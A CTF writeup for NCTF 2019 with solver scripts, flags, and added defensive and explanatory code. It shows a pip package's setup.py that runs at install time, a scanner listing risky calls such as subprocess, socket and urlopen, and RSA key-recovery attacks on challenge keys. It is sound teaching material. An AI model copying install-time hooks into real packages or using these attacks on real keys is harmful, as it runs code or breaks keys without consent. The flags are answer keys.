2019NCTF(some)

November 25, 2019

2019-NCTF

What crushed me? A pile of coursework!!! The contest landed exactly when this newbie had to grind through assignments; I'm weak to begin with, and with that on top it was just too much... I only had time to look at a handful of challenges before the clock ran out. Sigh, enough said.

MISC

问卷调查 (Questionnaire)

Just fill in a questionnaire, no tricks; I was expecting some trap hidden in it.

pip install

Didn't get this one at first; homework has numbed my brain, emmm.

After installing the package with pip install --user 2019xxxxxx and looking at what it put on disk, there was only the installation record and a single .py script, whose content said the flag was already on the local machine.

So the install script itself must be doing something. I downloaded the package archive with wget and read its setup.py directly, and there it was:

import tempfile
from os import path, system

# Runs at install time, inside pip: drops a marker file in the temp directory
# whose content is the (base64-encoded) flag.
tmp_file = tempfile.gettempdir() + path.sep + '.f14g_is_here'
f = open(tmp_file, 'w')
f.write('TkNURntjNHJlZnVsX2FiMHU3X2V2MWxfcGlwX3A0Y2thZ2V9')
f.close()

At install time it drops .f14g_is_here in the local temp directory with the content TkNURntjNHJlZnVsX2FiMHU3X2V2MWxfcGlwX3A0Y2thZ2V9, which is obviously base64. That is the whole lesson of the challenge: pip runs an sdist's setup.py with the installing user's privileges, so installing a package is executing its author's code.
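Because pip executes setup.py with your privileges, the safer habit is to fetch the sdist archive without installing it (wget, as above) and read setup.py before anything runs. The following is an added example, not code from the writeup or from the challenge package: it parses a setup.py with Python's ast module, lists imports and calls worth a manual look, and decodes base64-looking literals. The suspicious-name lists are my own triage heuristics, and SAMPLE_SETUP_PY is the fragment shown above embedded as a constructed input.

```python
import ast
import base64
import re

# Constructed input: the install-time payload shown above, embedded as a string.
SAMPLE_SETUP_PY = """
import tempfile
from os import path, system

tmp_file = tempfile.gettempdir() + path.sep + '.f14g_is_here'
f = open(tmp_file, 'w')
f.write('TkNURntjNHJlZnVsX2FiMHU3X2V2MWxfcGlwX3A0Y2thZ2V9')
f.close()
"""

# Assumption: these lists are this example's own heuristics, not a pip feature.
SUSPICIOUS_MODULES = {"tempfile", "subprocess", "socket", "urllib", "requests",
                      "ctypes", "base64", "zlib", "marshal"}
SUSPICIOUS_CALLS = {"open", "system", "popen", "Popen", "run", "call", "check_output",
                    "exec", "eval", "compile", "__import__", "urlopen", "b64decode"}
B64_LITERAL = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def _call_name(func):
    """Bare name for name(...) or obj.attr(...) call targets; None otherwise."""
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None


def scan_setup_py(source):
    """Return (kind, detail, lineno) findings for a setup.py without executing it."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in SUSPICIOUS_MODULES:
                    findings.append(("import", alias.name, node.lineno))
        elif isinstance(node, ast.ImportFrom):
            if node.module and node.module.split(".")[0] in SUSPICIOUS_MODULES:
                findings.append(("import", node.module, node.lineno))
            for alias in node.names:            # e.g. `from os import system`
                if alias.name in SUSPICIOUS_CALLS:
                    findings.append(("import", f"{node.module}.{alias.name}", node.lineno))
        elif isinstance(node, ast.Call):
            name = _call_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append(("call", name, node.lineno))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if B64_LITERAL.match(node.value):
                findings.append(("b64-literal", node.value, node.lineno))
    return findings


def decode_b64_literals(findings):
    """Decode the flagged literals that are valid base64 and printable ASCII."""
    decoded = {}
    for kind, value, _ in findings:
        if kind != "b64-literal":
            continue
        try:
            decoded[value] = base64.b64decode(value, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            pass
    return decoded


if __name__ == "__main__":
    hits = scan_setup_py(SAMPLE_SETUP_PY)
    for kind, detail, lineno in hits:
        print(f"line {lineno}: {kind} {detail}")
    print(decode_b64_literals(hits))
```

A static pass like this is a triage aid, not a sandbox: obfuscated code will slip past a name list, so anything you cannot read should be installed only in a throwaway environment.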

a_good_idea

Just change the extension and extract: two images and a hint.

hint: look for the secret in the pixels

I first assumed a blind watermark, but nothing came out, and comparing the two images in Stegsolve.jar showed nothing either. Then I remembered tolerance comparison, which I hadn't used in ages: loading both images in Beyond Compare showed a QR code right away, and scanning it gives the flag.
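What Beyond Compare's tolerance view does is a per-pixel difference against a threshold. The added example below (mine, not from the writeup) does the same in plain Python so the result can be written out as a PBM image and scanned. The two 8x8 sample images are constructed inline: the second differs from the first by a value of 1 in a few channels, which is invisible to the eye and is also hidden by any non-zero tolerance. load_pixels is an optional helper that assumes Pillow is installed.

```python
def diff_mask(img_a, img_b, tolerance=0):
    """1 where any channel of the two pixels differs by more than `tolerance`.

    Images are lists of rows, each row a list of (r, g, b) tuples.
    """
    h, w = len(img_a), len(img_a[0])
    if (h, w) != (len(img_b), len(img_b[0])):
        raise ValueError("images must have the same dimensions")
    mask = []
    for y in range(h):
        row = []
        for x in range(w):
            delta = max(abs(a - b) for a, b in zip(img_a[y][x], img_b[y][x]))
            row.append(1 if delta > tolerance else 0)
        mask.append(row)
    return mask


def to_pbm(mask):
    """Plain-text PBM (P1) so the mask can be opened or fed to a QR scanner."""
    h, w = len(mask), len(mask[0])
    lines = ["P1", f"{w} {h}"]
    lines += [" ".join(str(v) for v in row) for row in mask]
    return "\n".join(lines) + "\n"


def load_pixels(path):
    """Optional loader for real files; assumes Pillow is installed."""
    from PIL import Image
    im = Image.open(path).convert("RGB")
    w, h = im.size
    px = list(im.getdata())
    return [px[y * w:(y + 1) * w] for y in range(h)]


# Constructed sample: flat grey cover and a copy nudged by 1 along a pattern.
PATTERN = [
    "#####...",
    "#...#.#.",
    "#.#.#...",
    "#...#.##",
    "#####.#.",
    "......#.",
    "#.#.####",
    ".#.#..#.",
]
COVER = [[(200, 200, 200) for _ in range(8)] for _ in range(8)]
STEGO = [[(200, 200, 201) if PATTERN[y][x] == "#" else (200, 200, 200)
          for x in range(8)] for y in range(8)]


def expected_mask():
    return [[1 if ch == "#" else 0 for ch in row] for row in PATTERN]


if __name__ == "__main__":
    print(to_pbm(diff_mask(COVER, STEGO, tolerance=0)))
```

Start with tolerance 0 and raise it only if JPEG noise swamps the result; a one-unit LSB pattern like the one above disappears as soon as the tolerance is 1.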

键盘侠 (Keyboard Warrior)

Opened the file in WinHex: the data at the end is not a JPEG trailer but a Word document. I searched for FFD9 (the JPEG end-of-image marker), manually extracted the bytes following the image data, and saved them as a file. Opening it showed a single sentence saying there is a strange string; showing hidden text revealed that string.

image-20191125164149476

image-20191125164758131

It had special characters in it and looked like uuencode, but uudecode didn't work. So I went through the other encodings one by one; all of them produce special characters and none decoded it. Only the base family was left untried, but the site wanted payment for that, so I gave up. Later a senior told me that Python 3.x's base64 library ships decoders beyond base64 that can be used directly... cry~~

In the end Python 3's base85 decoder gives the flag.
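Both steps of this challenge (carving the document appended after the JPEG, then identifying which base-family encoding the string uses) are mechanical. The added example below is my own code, not the writeup's: carve_after_jpeg finds the FFD9 end-of-image marker and labels the trailing data by its magic bytes, and try_decoders runs the string through the standard library's base16/32/64/Ascii85/base85 decoders and keeps the ones that yield printable text. The JPEG bytes and the secret are constructed sample data.

```python
import base64
import binascii

JPEG_SOI, JPEG_EOI = b"\xff\xd8", b"\xff\xd9"

# Magic numbers of containers commonly stapled onto an image.
MAGICS = [
    (b"PK\x03\x04", "zip container (docx/xlsx/pptx/apk)"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE2 compound file (doc/xls/ppt)"),
    (b"%PDF", "pdf"),
    (b"Rar!", "rar"),
    (b"7z\xbc\xaf\x27\x1c", "7z"),
]


def identify(blob):
    for magic, label in MAGICS:
        if blob.startswith(magic):
            return label
    return "unknown"


def carve_after_jpeg(data):
    """(offset, trailing_bytes, label) for data appended after a JPEG, or None.

    EXIF thumbnails also end with FFD9, so prefer the first EOI that is followed
    by a known magic and fall back to the last EOI otherwise.
    """
    if not data.startswith(JPEG_SOI):
        raise ValueError("not a JPEG")
    pos, last = data.find(JPEG_EOI), None
    while pos != -1:
        start = pos + 2
        if identify(data[start:]) != "unknown":
            return start, data[start:], identify(data[start:])
        last = start
        pos = data.find(JPEG_EOI, start)
    if last is None or last >= len(data):
        return None
    return last, data[last:], identify(data[last:])


# base64 is run in strict mode so a base85 string cannot "decode" as base64 by
# having its non-alphabet characters silently skipped.
DECODERS = {
    "base16": base64.b16decode,
    "base32": base64.b32decode,
    "base64": lambda s: base64.b64decode(s, validate=True),
    "ascii85": base64.a85decode,
    "base85": base64.b85decode,
}


def try_decoders(token):
    """Map decoder name -> text for every decoder that yields printable ASCII."""
    if isinstance(token, str):
        token = token.encode("ascii")
    results = {}
    for name, fn in DECODERS.items():
        try:
            raw = fn(token)
        except (ValueError, binascii.Error):
            continue
        if raw and all(32 <= b < 127 or b in b"\t\r\n" for b in raw):
            results[name] = raw.decode("ascii")
    return results


# Constructed sample: a minimal JPEG-looking header with a zip (docx) glued on.
SAMPLE_JPEG = (JPEG_SOI + b"\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16 + JPEG_EOI
               + b"PK\x03\x04" + b"word/document.xml")
SAMPLE_SECRET = b"NCTF{constructed_example_not_the_real_flag}"

if __name__ == "__main__":
    print(carve_after_jpeg(SAMPLE_JPEG))
    print(try_decoders(base64.b85encode(SAMPLE_SECRET)))
```

Note that "base85" covers two incompatible alphabets in Python alone (Ascii85 and RFC 1924 b85decode), and Z85 is yet another; a string that fails one of them has not been ruled out for the others.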

what's this

There is an embedded archive; export it and extract it to get a .txt file.

image-20191125195513454

image-20191125195540251

It's base64 steganography; just run the script:

import base64

# The writeup's heuristic: decode every line of the file and print the ones
# that decode to exactly 32 printable characters.
with open("What1s7his.txt", "r") as f:
    data = f.readlines()

for line in data:
    s = line.strip()
    if not s:
        continue
    try:
        raw = base64.b64decode(s)
    except ValueError:
        continue
    printable = sum(1 for b in raw if 32 <= b <= 126)
    if printable == 32:
        print(raw)
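The script above relies on a length heuristic; the classic "base64 steganography" hides bits in the padding bits that a decoder throws away: a line ending in one "=" has 2 unused low bits in its last data character, a line ending in "==" has 4. The added example below is my own code, not the writeup's: it embeds a message that way into a constructed cover text and extracts it again, and shows that the cover still decodes to the original bytes. The cover lines and the secret are constructed sample data.

```python
import base64

B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def _padding(enc):
    """Number of '=' characters (0, 1 or 2) at the end of a base64 line."""
    return len(enc) - len(enc.rstrip("="))


def b64_stego_embed(cover_lines, secret):
    """Hide `secret` in the unused low bits before the '=' padding of each line."""
    bits = "".join(format(b, "08b") for b in secret)
    pos, out = 0, []
    for line in cover_lines:
        enc = base64.b64encode(line).decode("ascii")
        pad = _padding(enc)
        if pad and pos < len(bits):
            n = 2 * pad                          # spare bits in this line
            chunk = bits[pos:pos + n].ljust(n, "0")
            pos += n
            idx = len(enc) - pad - 1             # last data character
            value = B64_ALPHABET.index(enc[idx])
            value = (value & ~((1 << n) - 1)) | int(chunk, 2)
            enc = enc[:idx] + B64_ALPHABET[value] + enc[idx + 1:]
        out.append(enc)
    return out


def b64_stego_extract(lines):
    """Collect the spare bits of every padded line and pack them into bytes."""
    bits = ""
    for enc in lines:
        enc = enc.strip()
        pad = _padding(enc)
        if pad == 0:
            continue
        value = B64_ALPHABET.index(enc[len(enc) - pad - 1])
        bits += format(value, "06b")[-2 * pad:]
    usable = len(bits) - len(bits) % 8
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))


def b64_decode_lines(lines):
    """Plain decode: the hidden bits do not disturb the cover text at all."""
    return [base64.b64decode(line) for line in lines]


# Constructed cover text: line lengths chosen so most lines carry padding.
COVER_LINES = [b"a", b"bb", b"cccc", b"ddddd", b"e", b"ff", b"gggg", b"hhhhh", b"i", b"jj"]
SECRET = b"hi"

if __name__ == "__main__":
    stego = b64_stego_embed(COVER_LINES, SECRET)
    print("\n".join(stego))
    print(b64_stego_extract(stego))
```

Lines without padding carry nothing, and the extractor returns trailing zero bytes for padded lines that were never written, so strip them when reading the result.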

Crypto

Keyboard

ooo yyy ii w uuu ee uuuu yyy uuuu y w uuu i i rr w i i rr rrr uuuu rrr uuuu t ii uuuu i w u rrr ee www ee yyy eee www w tt ee

Every letter is from the top row of a QWERTY keyboard, so each maps to the digit above it:

q-1 w-2 e-3 r-4 t-5 y-6 u-7 i-8 o-9 p-0

Each group of repeated letters is then one key pressed that many times on a 9-key (T9) keypad:

y 999 o 666 u 88 a 2 r 777 e 33 s 7777 o 666 s 7777

m 6 a 2 r 777 t 8 t 8 h 44 a 2 t 8 t 8 h 44 i 444

s 7777 i 444 s 7777 j 5 u 88 s 7777 t 8 a 2 p 7 i 444

e 33 c 222 e 33 o 666 f 333 c 222 a 2 k 55 e 33

NCTF{youaresosmartthatthisisjustapieceofcake}

babyrsa

# -*- coding: utf-8 -*-
# Only e, d and c are known. p and q are adjacent primes (q = nextPrime(p)), so
# e*d - 1 = k*phi with a small k assembled from the factor list f, and when
# q = p + 2i one has phi + i^2 = (p - 1 + i)^2, which gives p from a square root.
from Crypto.Util.number import isPrime, long_to_bytes
import gmpy2

a = 0
b = []
f = [2, 2, 2, 2, 2, 2, 3, 5, 7, 7, 29, 31, 61, 101, 33871, 91781, 112939]
e = 0x10001
d = 19275778946037899718035455438175509175723911466127462154506916564101519923603308900331427601983476886255849200332374081996442976307058597390881168155862238533018621944733299208108185814179466844504468163200369996564265921022888670062554504758512453217434777820468049494313818291727050400752551716550403647148197148884408264686846693842118387217753516963449753809860354047619256787869400297858568139700396567519469825398575103885487624463424429913017729585620877168171603444111464692841379661112075123399343270610272287865200880398193573260848268633461983435015031227070217852728240847398084414687146397303110709214913
c = 5382723168073828110696168558294206681757991149022777821127563301413483223874527233300721180839298617076705685041174247415826157096583055069337393987892262764211225227035880754417457056723909135525244957935906902665679777101130111392780237502928656225705262431431953003520093932924375902111280077255205118217436744112064069429678632923259898627997145803892753989255615273140300021040654505901442787810653626524305706316663169341797205752938755590056568986738227803487467274114398257187962140796551136220532809687606867385639367743705527511680719955380746377631156468689844150878381460560990755652899449340045313521804


def dfs(i, s):
    """Enumerate products of subsets of f below 120000: the candidates for k."""
    global a
    if i == 16:
        if s < 120000:
            b.append(s)
            a += 1
        if s * f[i] < 120000:
            b.append(s * f[i])
            a += 1
    else:
        dfs(i + 1, s)
        dfs(i + 1, s * f[i])


def nextPrime(n):
    n += 2 if n & 1 else 1
    while not isPrime(n):
        n += 2
    return n


x = e * d - 1
dfs(0, 1)
for j in range(a):
    if x % b[j]:
        continue                          # k must divide e*d - 1 exactly
    xx = x // b[j]                        # candidate phi
    for i in range(0, 2000):
        xxx = xx + i * i
        if gmpy2.iroot(xxx, 2)[1]:        # perfect square: the root is p - 1 + i
            p = int(gmpy2.iroot(xxx, 2)[0]) - i + 1
            q = nextPrime(p)
            n = p * q
            m = pow(c, d, n)
            print(long_to_bytes(m))

childyrsa

# Pollard's p-1: one prime factor has p-1 smooth over the primes below 10000
# (exactly the primes in Crypto.Util.number.sieve_base), so
# 3^(product of those primes) == 1 (mod p) and a gcd with n yields p.
from Crypto.Util.number import sieve_base, long_to_bytes
from math import gcd
import gmpy2

n = 32849718197337581823002243717057659218502519004386996660885100592872201948834155543125924395614928962750579667346279456710633774501407292473006312537723894221717638059058796679686953564471994009285384798450493756900459225040360430847240975678450171551048783818642467506711424027848778367427338647282428667393241157151675410661015044633282064056800913282016363415202171926089293431012379261585078566301060173689328363696699811123592090204578098276704877408688525618732848817623879899628629300385790344366046641825507767709276622692835393219811283244303899850483748651722336996164724553364097066493953127153066970594638491950199605713033004684970381605908909693802373826516622872100822213645899846325022476318425889580091613323747640467299866189070780620292627043349618839126919699862580579994887507733838561768581933029077488033326056066378869170169389819542928899483936705521710423905128732013121538495096959944889076705471928490092476616709838980562233255542325528398956185421193665359897664110835645928646616337700617883946369110702443135980068553511927115723157704586595844927607636003501038871748639417378062348085980873502535098755568810971926925447913858894180171498580131088992227637341857123607600275137768132347158657063692388249513
c = 26308018356739853895382240109968894175166731283702927002165268998773708335216338997058314157717147131083296551313334042509806229853341488461087009955203854253313827608275460592785607739091992591431080342664081962030557042784864074533380701014585315663218783130162376176094773010478159362434331787279303302718098735574605469803801873109982473258207444342330633191849040553550708886593340770753064322410889048135425025715982196600650740987076486540674090923181664281515197679745907830107684777248532278645343716263686014941081417914622724906314960249945105011301731247324601620886782967217339340393853616450077105125391982689986178342417223392217085276465471102737594719932347242482670320801063191869471318313514407997326350065187904154229557706351355052446027159972546737213451422978211055778164578782156428466626894026103053360431281644645515155471301826844754338802352846095293421718249819728205538534652212984831283642472071669494851823123552827380737798609829706225744376667082534026874483482483127491533474306552210039386256062116345785870668331513725792053302188276682550672663353937781055621860101624242216671635824311412793495965628876036344731733142759495348248970313655381407241457118743532311394697763283681852908564387282605279108
e = 0x10001

a = 2
for p in sieve_base:          # every prime below 10000
    a *= p

p = gcd(pow(3, a, n) - 1, n)  # 3^a == 1 mod the prime whose p-1 is 10000-smooth
q = n // p
phi_n = (p - 1) * (q - 1)
d = int(gmpy2.invert(e, phi_n))
m = pow(c, d, n)

print(long_to_bytes(m))

NCTF{Th3r3_ar3_1ns3cure_RSA_m0duli_7hat_at_f1rst_gl4nce_appe4r_t0_be_s3cur3}
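Both babyrsa and childyrsa rest on arithmetic facts that are easy to check on small parameters. For babyrsa: since d < phi(n), k = (e*d - 1)/phi(n) is an integer smaller than e, so every candidate phi is e*d - 1 divided by one of its divisors below e, and when q = p + 2i one has phi + i^2 = (p - 1 + i)^2. For childyrsa: if p - 1 is B-smooth then base^(lcm of the prime powers up to B) == 1 (mod p), so a gcd with n recovers p (Pollard's p-1). The added example below is my own code rather than either script above: it implements both attacks with the standard library only and round-trips them on toy keys it generates itself. The helper names, the toy sizes and the seed are assumptions of the example.

```python
import random
from math import gcd, isqrt

# Miller-Rabin with these bases is deterministic below 3.3e24, plenty for the toy sizes.
_MR_BASES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)


def is_prime(n):
    if n < 2:
        return False
    for p in _MR_BASES:
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for a in _MR_BASES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def next_prime(n):
    n += 1 if n % 2 == 0 else 2
    while not is_prime(n):
        n += 2
    return n


def divisors_up_to(x, bound):
    """Every divisor of x not exceeding bound (they only contain primes <= bound)."""
    divs, y = [1], x
    for p in range(2, bound + 1):
        if y % p:
            continue
        exp = 0
        while y % p == 0:
            y //= p
            exp += 1
        divs = [d * p ** k for d in divs for k in range(exp + 1) if d * p ** k <= bound]
    return sorted(set(divs))


def recover_adjacent_primes(e, d, gap_bound=2000):
    """babyrsa: (p, q) from (e, d) alone when q is the prime right after p."""
    x = e * d - 1
    for k in divisors_up_to(x, e - 1):          # k = x / phi < e because d < phi
        phi = x // k
        for i in range(gap_bound):               # q = p + 2i  =>  phi + i^2 = (p-1+i)^2
            r = isqrt(phi + i * i)
            if r * r != phi + i * i:
                continue
            p = r - i + 1
            if p > 2 and is_prime(p):
                q = next_prime(p)
                if (p - 1) * (q - 1) == phi:
                    return p, q
    return None


def pollard_pm1(n, B=10000, base=2):
    """childyrsa: stage-1 Pollard p-1 over the prime powers <= B; None on failure."""
    a = base
    for q in (q for q in range(2, B + 1) if is_prime(q)):
        power = q
        while power * q <= B:                    # largest power of q not above B
            power *= q
        a = pow(a, power, n)
        g = gcd(a - 1, n)
        if 1 < g < n:
            return g
        if g == n:                               # p-1 and q-1 both smooth: overshoot
            return None
    return None


# Toy key generators for the round trips (assumptions of this example, not challenge data).
def toy_adjacent_key(start, e=65537):
    p = next_prime(start)
    while True:
        q = next_prime(p)
        phi = (p - 1) * (q - 1)
        if gcd(e, phi) == 1:
            return p, q, e, pow(e, -1, phi)
        p = q


def smooth_prime(B, bits, seed=0):
    """A prime p with p-1 a product of distinct primes <= B: what Pollard p-1 exploits."""
    rng = random.Random(seed)
    small = [q for q in range(3, B + 1) if is_prime(q)]
    while True:
        m, pool = 2, list(small)
        while m.bit_length() < bits:
            m *= pool.pop(rng.randrange(len(pool)))
        if is_prime(m + 1):
            return m + 1


def safe_prime_after(start):
    """q = 2r + 1 with r prime, so q-1 has a prime factor far above B."""
    r = next_prime(start)
    while not is_prime(2 * r + 1):
        r = next_prime(r)
    return 2 * r + 1
```

The (p-1)(q-1) == phi check in recover_adjacent_primes is stronger than simply trying to decrypt: it rejects spurious square roots from a wrong k before any ciphertext is touched. In pollard_pm1 the gcd is taken after every prime so that a modulus whose two primes are both smooth is reported as an overshoot instead of returning n.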

sore

Vigenère cipher; I didn't manage to crack it.

Re

签到 (Sign-in)

It really is just a sign-in.

image-20191125200000138

The function at the start does nothing of interest; sub_401340(&v4) takes our input, and inside it is a pile of linear equations.

image-20191125201907307

The expected value of every equation is given, so just run z3:

from z3 import *

solver = Solver()

# 49 unknown characters, constrained to printable ASCII
flag = [Int('flag%d' % i) for i in range(49)]
for i in range(49):
    solver.add(flag[i] >= 32)
    solver.add(flag[i] <= 127)

# Expected results read out of the binary; str[k] is the right-hand side of the
# k-th equation below (the name shadows the builtin but the equations use it).
str = [0, 0,
18564, 37316, 32053, 33278, 23993, 33151, 15248, 13719, 34137, 27391, 28639, 18453, 28465, 12384, 20780, 45085, 35827, 37243, 26037, 39409, 17583, 20825, 44474, 35138, 36914, 25918, 38915, 17672, 21219, 43935, 37072, 39359, 27793, 41447, 18098, 21335, 46164, 38698, 39084, 29205, 40913, 19117, 21786, 46573, 38322, 41017, 29298, 43409, 19655]
solver.add(str[2] == 34 * flag[3] + 12 * flag[0] + 53 * flag[1] + 6 * flag[2] + 58 * flag[4] + 36 * flag[5] + flag[6])
solver.add(str[3] == 27 * flag[4] + 73 * flag[3] + 12 * flag[2] + 83 * flag[0] + 85 * flag[1] + 96 * flag[5] + 52 * flag[6])
solver.add(str[4] == 24 * flag[2] + 78 * flag[0] + 53 * flag[1] + 36 * flag[3] + 86 * flag[4] + 25 * flag[5] + 46 * flag[6])
solver.add(str[5] == 78 * flag[1] + 39 * flag[0] + 52 * flag[2] + 9 * flag[3] + 62 * flag[4] + 37 * flag[5] + 84 * flag[6])
solver.add(str[6] == 48 * flag[4] + 6 * flag[1] + 23 * flag[0] + 14 * flag[2] + 74 * flag[3] + 12 * flag[5] + 83 * flag[6])
solver.add(str[7] == 15 * flag[5] + 48 * flag[4] + 92 * flag[2] + 85 * flag[1] + 27 * flag[0] + 42 * flag[3] + 72 * flag[6])
solver.add(str[8] == 26 * flag[5] + 67 * flag[3] + 6 * flag[1] + 4 * flag[0] + 3 * flag[2] + 68 * flag[6])
solver.add(str[9] == 34 * flag[10] + 12 * flag[7] + 53 * flag[8] + 6 * flag[9] + 58 * flag[11] + 36 * flag[12] + flag[13])
solver.add(str[10] == 27 * flag[11] + 73 * flag[10] + 12 * flag[9] + 83 * flag[7] + 85 * flag[8] + 96 * flag[12] + 52 * flag[13])
solver.add(str[11] == 24 * flag[9] + 78 * flag[7] + 53 * flag[8] + 36 * flag[10] + 86 * flag[11] + 25 * flag[12] + 46 * flag[13])
solver.add(str[12] == 78 * flag[8] + 39 * flag[7] + 52 * flag[9] + 9 * flag[10] + 62 * flag[11] + 37 * flag[12] + 84 * flag[13])
solver.add(str[13] == 48 * flag[11] + 6 * flag[8] + 23 * flag[7] + 14 * flag[9] + 74 * flag[10] + 12 * flag[12] + 83 * flag[13])
solver.add(str[14] == 15 * flag[12] + 48 * flag[11] + 92 * flag[9] + 85 * flag[8] + 27 * flag[7] + 42 * flag[10] + 72 * flag[13])
solver.add(str[15] == 26 * flag[12] + 67 * flag[10] + 6 * flag[8] + 4 * flag[7] + 3 * flag[9] + 68 * flag[13])
solver.add(str[16] == 34 * flag[17] + 12 * flag[14] + 53 * flag[15] + 6 * flag[16] + 58 * flag[18] + 36 * flag[19] + flag[20])
solver.add(str[17] == 27 * flag[18] + 73 * flag[17] + 12 * flag[16] + 83 * flag[14] + 85 * flag[15] + 96 * flag[19] + 52 * flag[20])
solver.add(str[18] == 24 * flag[16] + 78 * flag[14] + 53 * flag[15] + 36 * flag[17] + 86 * flag[18] + 25 * flag[19] + 46 * flag[20])
solver.add(str[19] == 78 * flag[15] + 39 * flag[14] + 52 * flag[16] + 9 * flag[17] + 62 * flag[18] + 37 * flag[19] + 84 * flag[20])
solver.add(str[20] == 48 * flag[18] + 6 * flag[15] + 23 * flag[14] + 14 * flag[16] + 74 * flag[17] + 12 * flag[19] + 83 * flag[20])
solver.add(str[21] == 15 * flag[19] + 48 * flag[18] + 92 * flag[16] + 85 * flag[15] + 27 * flag[14] + 42 * flag[17] + 72 * flag[20])
solver.add(str[22] == 26 * flag[19] + 67 * flag[17] + 6 * flag[15] + 4 * flag[14] + 3 * flag[16] + 68 * flag[20])
solver.add(str[23] == 34 * flag[24] + 12 * flag[21] + 53 * flag[22] + 6 * flag[23] + 58 * flag[25] + 36 * flag[26] + flag[27])
solver.add(str[24] == 27 * flag[25] + 73 * flag[24] + 12 * flag[23] + 83 * flag[21] + 85 * flag[22] + 96 * flag[26] + 52 * flag[27])
solver.add(str[25] == 24 * flag[23] + 78 * flag[21] + 53 * flag[22] + 36 * flag[24] + 86 * flag[25] + 25 * flag[26] + 46 * flag[27])
solver.add(str[26] == 78 * flag[22] + 39 * flag[21] + 52 * flag[23] + 9 * flag[24] + 62 * flag[25] + 37 * flag[26] + 84 * flag[27])
solver.add(str[27] == 48 * flag[25] + 6 * flag[22] + 23 * flag[21] + 14 * flag[23] + 74 * flag[24] + 12 * flag[26] + 83 * flag[27])
solver.add(str[28] == 15 * flag[26] + 48 * flag[25] + 92 * flag[23] + 85 * flag[22] + 27 * flag[21] + 42 * flag[24] + 72 * flag[27])
solver.add(str[29] == 26 * flag[26] + 67 * flag[24] + 6 * flag[22] + 4 * flag[21] + 3 * flag[23] + 68 * flag[27])
solver.add(str[30] == 34 * flag[31] + 12 * flag[28] + 53 * flag[29] + 6 * flag[30] + 58 * flag[32] + 36 * flag[33] + flag[34])
solver.add(str[31] == 27 * flag[32] + 73 * flag[31] + 12 * flag[30] + 83 * flag[28] + 85 * flag[29] + 96 * flag[33] + 52 * flag[34])
solver.add(str[32] == 24 * flag[30] + 78 * flag[28] + 53 * flag[29] + 36 * flag[31] + 86 * flag[32] + 25 * flag[33] + 46 * flag[34])
solver.add(str[33] == 78 * flag[29] + 39 * flag[28] + 52 * flag[30] + 9 * flag[31] + 62 * flag[32] + 37 * flag[33] + 84 * flag[34])
solver.add(str[34] == 48 * flag[32] + 6 * flag[29] + 23 * flag[28] + 14 * flag[30] + 74 * flag[31] + 12 * flag[33] + 83 * flag[34])
solver.add(str[35] == 15 * flag[33] + 48 * flag[32] + 92 * flag[30] + 85 * flag[29] + 27 * flag[28] + 42 * flag[31] + 72 * flag[34])
solver.add(str[36] == 26 * flag[33] + 67 * flag[31] + 6 * flag[29] + 4 * flag[28] + 3 * flag[30] + 68 * flag[34])
solver.add(str[37] == 34 * flag[38] + 12 * flag[35] + 53 * flag[36] + 6 * flag[37] + 58 * flag[39] + 36 * flag[40] + flag[41])
solver.add(str[38] == 27 * flag[39] + 73 * flag[38] + 12 * flag[37] + 83 * flag[35] + 85 * flag[36] + 96 * flag[40] + 52 * flag[41])
solver.add(str[39] == 24 * flag[37] + 78 * flag[35] + 53 * flag[36] + 36 * flag[38] + 86 * flag[39] + 25 * flag[40] + 46 * flag[41])
solver.add(str[40] == 78 * flag[36] + 39 * flag[35] + 52 * flag[37] + 9 * flag[38] + 62 * flag[39] + 37 * flag[40] + 84 * flag[41])
solver.add(str[41] == 48 * flag[39] + 6 * flag[36] + 23 * flag[35] + 14 * flag[37] + 74 * flag[38] + 12 * flag[40] + 83 * flag[41])
solver.add(str[42] == 15 * flag[40] + 48 * flag[39] + 92 * flag[37] + 85 * flag[36] + 27 * flag[35] + 42 * flag[38] + 72 * flag[41])
solver.add(str[43] == 26 * flag[40] + 67 * flag[38] + 6 * flag[36] + 4 * flag[35] + 3 * flag[37] + 68 * flag[41])
solver.add(str[44] == 34 * flag[45] + 12 * flag[42] + 53 * flag[43] + 6 * flag[44] + 58 * flag[46] + 36 * flag[47] + flag[48])
solver.add(str[45] == 27 * flag[46] + 73 * flag[45] + 12 * flag[44] + 83 * flag[42] + 85 * flag[43] + 96 * flag[47] + 52 * flag[48])
solver.add(str[46] == 24 * flag[44] + 78 * flag[42] + 53 * flag[43] + 36 * flag[45] + 86 * flag[46] + 25 * flag[47] + 46 * flag[48])
solver.add(str[47] == 78 * flag[43] + 39 * flag[42] + 52 * flag[44] + 9 * flag[45] + 62 * flag[46] + 37 * flag[47] + 84 * flag[48])
solver.add(str[48] == 48 * flag[46] + 6 * flag[43] + 23 * flag[42] + 14 * flag[44] + 74 * flag[45] + 12 * flag[47] + 83 * flag[48])
solver.add(str[49] == 15 * flag[47] + 48 * flag[46] + 92 * flag[44] + 85 * flag[43] + 27 * flag[42] + 42 * flag[45] + 72 * flag[48])
solver.add(str[50] == 26 * flag[47] + 67 * flag[45] + 6 * flag[43] + 4 * flag[42] + 3 * flag[44] + 68 * flag[48])

if solver.check() == sat:
    m = solver.model()
    s = [m[flag[i]].as_long() for i in range(49)]
    print(bytes(s))
    print("".join(chr(i) for i in s))
else:
    print('error')
